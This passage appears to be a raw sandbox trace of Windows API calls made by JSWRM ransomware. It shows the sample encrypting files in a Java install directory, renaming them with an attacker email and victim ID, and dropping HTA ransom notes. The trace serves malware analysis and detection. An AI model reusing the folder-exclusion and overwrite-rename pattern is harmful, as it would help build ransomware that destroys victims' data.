lstrcmpiW (lpString1="COPYRIGHT", lpString2="...") returned 1 [0069.766] lstrcmpiW (lpString1="COPYRIGHT", lpString2="windows") returned -1 [0069.766] lstrcmpiW (lpString1="COPYRIGHT", lpString2="recovery") returned -1 [0069.766] lstrcmpiW (lpString1="COPYRIGHT", lpString2="perflogs") returned -1 [0069.767] lstrcmpiW (lpString1="COPYRIGHT", lpString2="documents and settings") returned -1 [0069.767] lstrcmpiW (lpString1="COPYRIGHT", lpString2="$RECYCLE.BIN") returned 1 [0069.767] lstrcmpiW (lpString1="COPYRIGHT", lpString2="system volume information") returned -1 [0069.767] lstrcmpiW (lpString1="COPYRIGHT", lpString2="msocache") returned -1 [0069.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COPYRIGHT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COPYRIGHT", cchWideChar=9, lpMultiByteStr=0x345f2a8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COPYRIGHT", lpUsedDefaultChar=0x0) returned 9 [0069.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COPYRIGHT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COPYRIGHT", cchWideChar=9, lpMultiByteStr=0x345f278, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COPYRIGHT", lpUsedDefaultChar=0x0) returned 9 [0069.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0069.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0069.767] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0069.767] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=3244) returned 1 [0069.767] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xca0) returned 0x24c1d0 [0069.767] ReadFile (in: hFile=0x298, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xca0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ef6c*=0xca0, lpOverlapped=0x0) returned 1 [0069.769] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.769] WriteFile (in: hFile=0x298, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ef68*=0xca0, lpOverlapped=0x0) returned 1 [0069.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.769] CloseHandle (hObject=0x298) returned 1 [0069.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0069.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0069.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0069.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0069.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0069.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0069.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.770] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0069.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0069.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0069.770] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200811e2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x200811e2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.770] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.771] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.771] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.771] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.771] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="lib", cAlternateFileName="")) returned 1 [0069.771] lstrcmpiW (lpString1="lib", lpString2=".") returned 1 [0069.771] lstrcmpiW (lpString1="lib", lpString2="..") returned 1 [0069.771] lstrcmpiW (lpString1="lib", lpString2="...") returned 1 [0069.771] lstrcmpiW (lpString1="lib", lpString2="windows") returned -1 [0069.771] lstrcmpiW (lpString1="lib", lpString2="recovery") returned -1 [0069.771] lstrcmpiW (lpString1="lib", lpString2="perflogs") returned -1 [0069.771] lstrcmpiW (lpString1="lib", lpString2="documents and settings") returned 1 [0069.771] lstrcmpiW (lpString1="lib", lpString2="$RECYCLE.BIN") returned 1 [0069.771] lstrcmpiW (lpString1="lib", lpString2="system volume information") returned -1 [0069.771] lstrcmpiW (lpString1="lib", lpString2="msocache") returned -1 [0069.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0069.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0069.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0069.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0069.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jswrm-decrypt.hta")) returned 0xffffffff [0069.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0069.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0069.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0069.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0069.774] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0069.775] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.775] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0069.776] CloseHandle (hObject=0x298) returned 1 [0069.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0069.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0069.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0069.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0069.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0069.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0069.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0069.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jswrm-decrypt.hta")) returned 0x20 [0069.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0069.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0069.777] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x203fe54e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0069.777] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.777] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x203fe54e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0069.778] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.778] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.778] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x95, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="accessibility.properties", cAlternateFileName="ACCESS~1.PRO")) returned 1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2=".") returned 1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2="..") returned 1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2="...") returned 1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2="windows") returned -1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2="recovery") returned -1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2="perflogs") returned -1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2="documents and settings") returned -1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2="system volume information") returned -1 [0069.778] lstrcmpiW (lpString1="accessibility.properties", lpString2="msocache") returned -1 [0069.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0069.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.properties", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0069.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.properties", cchWideChar=24, lpMultiByteStr=0x240fc0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.properties", lpUsedDefaultChar=0x0) returned 24 [0069.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0069.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.properties", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0069.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.properties", cchWideChar=24, lpMultiByteStr=0x240f48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.properties", lpUsedDefaultChar=0x0) returned 24 [0069.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0069.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0069.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0069.779] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.780] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=149) returned 1 [0069.780] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.780] ReadFile (in: hFile=0x454, lpBuffer=0x23b400, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesRead=0x345ec04*=0x90, lpOverlapped=0x0) returned 1 [0069.781] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.781] WriteFile (in: hFile=0x454, lpBuffer=0x23b400*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesWritten=0x345ec00*=0x90, lpOverlapped=0x0) returned 1 [0069.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.781] CloseHandle (hObject=0x454) returned 1 [0069.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0069.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0069.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.783] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program 